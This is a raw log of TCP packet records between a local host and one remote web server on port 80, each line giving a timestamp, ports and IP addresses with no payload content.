                                                                            Jan 2, 2025 20:34:57.409214973 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.409219027 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.409233093 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.409270048 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.414637089 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.414648056 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.414659023 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.414669037 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.414684057 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.414694071 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.414704084 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.414710999 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.414710999 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.414748907 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.425064087 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.425075054 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.425085068 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.425112963 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.425126076 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.425137043 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.425147057 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.425156116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.425160885 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.425167084 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.425177097 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.425189972 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.425221920 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.429445982 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.429457903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.429467916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.429477930 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.429488897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.429498911 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.429498911 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.429511070 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.429522038 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.429538012 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.429558992 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.448050976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.448062897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.448084116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.448095083 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.448108912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.448122978 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.448126078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.448137045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.448148012 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.448178053 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.448194981 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.456545115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.456624985 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.456634998 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.456650972 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.456651926 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.456661940 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.456672907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.456687927 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.456712961 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.456880093 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.459218025 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.459254026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.459265947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.459275961 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.459286928 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.459297895 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.459307909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.459325075 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.459327936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.459388971 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.459388971 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.459939957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.459949970 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.459959984 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.459969997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.460033894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.460035086 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.460035086 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.460046053 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.460061073 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.460072041 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.460083961 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.460808992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.460820913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.460830927 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.460835934 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.460840940 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.460851908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.460855007 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.460861921 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.460872889 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.460886955 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.463761091 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.477180958 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.477210999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.477221966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.477330923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.477348089 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.477358103 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.477360964 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.477374077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.477385044 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.477395058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.477396965 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.477405071 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.477415085 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.477416039 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.477425098 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.477436066 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.477436066 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.477451086 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.477458954 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.477463007 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.477478027 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.477478027 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.477489948 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.477499962 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.477509022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.477519035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.477533102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.477540970 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.477549076 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.477561951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.477571011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.477571011 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.477622986 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.477622986 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.478245974 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.478255987 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.478266001 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.478277922 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.478287935 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.478288889 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.478297949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.478307962 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.478308916 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.478331089 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.478354931 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.478354931 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.479753017 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.483573914 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.483611107 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.483622074 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.483652115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.483666897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.483676910 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.483676910 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.483676910 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.483692884 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.483704090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.483726978 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.483750105 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.487075090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.487086058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.487096071 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.487107992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.487124920 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.487133026 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.487135887 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.487145901 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.487157106 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.487189054 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.487274885 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.493159056 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.493171930 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.493181944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.493222952 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.493254900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.493266106 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.493275881 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.493283033 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.493285894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.493295908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.493300915 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.493326902 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.493326902 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.493393898 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.496021986 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.496047020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.496107101 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.496107101 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.496285915 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.496366978 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.496381998 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.496388912 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.496392965 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.496402979 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.496413946 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.496423006 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.496520042 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.501365900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.501378059 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.501394033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.501405954 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.501415968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.501425982 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.501430988 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.501436949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.501446962 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.501449108 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.501492023 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.501492023 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.511895895 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.511905909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.511917114 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.511938095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.511949062 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.511955976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.511967897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.511970043 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.511977911 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.511987925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.511998892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.511998892 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.512037039 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.512037039 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.516319990 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.516336918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.516350031 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.516365051 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.516376019 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.516386032 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.516388893 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.516396999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.516402006 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.516438961 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.516438961 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.534774065 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.534960032 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.534969091 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.534981012 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.534991980 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.535001993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.535012960 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.535023928 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.535051107 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.535756111 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.543282032 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.543292999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.543338060 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.543348074 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.543359995 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.543364048 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.543370962 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.543380976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.543389082 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.543401003 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.543406963 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.543415070 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.543500900 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.545994997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.546009064 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.546025991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.546036005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.546046019 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.546049118 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.546056032 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.546068907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.546077013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.546082020 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.546082020 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.546192884 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.546663046 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.546680927 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.546791077 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.546816111 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.546828032 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.546838045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.546848059 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.546859026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.546860933 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.546869993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.546895027 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.546895027 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.546957016 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.547506094 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.547518969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.547529936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.547545910 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.547557116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.547564983 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.547566891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.547578096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.547586918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.547602892 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.547750950 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.564053059 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.564074993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.564085960 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.564105988 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.564136028 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.564146996 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.564156055 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.564173937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.564184904 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.564194918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.564201117 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.564205885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.564228058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.564229012 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.564249039 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.564279079 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.564300060 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.564302921 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.564311981 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.564323902 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.564323902 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.564354897 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.564382076 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.564395905 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.564405918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.564414978 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.564424992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.564428091 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.564435005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.564440966 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.564445972 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.564455986 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.564466000 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.564474106 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.564487934 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.564506054 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.564654112 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.564960003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.564969063 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.564979076 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.565020084 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.565028906 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.565028906 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.565028906 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.565042019 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.565052986 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.565062046 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.565062046 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.565063953 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.565076113 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.565083981 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.565105915 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.570508003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.570553064 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.570563078 CET804973047.254.187.72192.168.2.4
